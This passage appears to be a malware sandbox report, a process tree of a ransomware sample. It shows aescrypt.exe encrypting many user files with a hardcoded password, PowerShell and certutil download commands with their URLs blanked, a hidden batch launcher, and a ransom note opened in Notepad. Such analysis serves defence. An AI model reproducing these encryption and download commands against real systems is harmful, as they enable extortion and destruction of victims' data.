    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopyConvert.rar.lck" "CopyConvert.rar"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterRead.mpeg.lck" "RegisterRead.mpeg"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "LockUse.clr.lck" "LockUse.clr"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterMount.mhtml.lck" "RegisterMount.mhtml"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveSwitch.cfg.lck" "ResolveSwitch.cfg"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveWrite.reg.lck" "ReceiveWrite.reg"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompletePop.vsd.lck" "CompletePop.vsd"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompleteProtect.mpg.lck" "CompleteProtect.mpg"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:324
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AssertSkip.wma.lck" "AssertSkip.wma"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BackupSet.gif.lck" "BackupSet.gif"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SelectEdit.xsl.lck" "SelectEdit.xsl"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:988
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\AppData\Local\Temp\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\AppData\Local\Temp\p2d.bat
      4⤵
      PID:1304
    - - C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:892
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1068
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:324
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1352
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
    3⤵
    PID:1352
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
    3⤵
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
    3⤵
    PID:988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
    3⤵
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
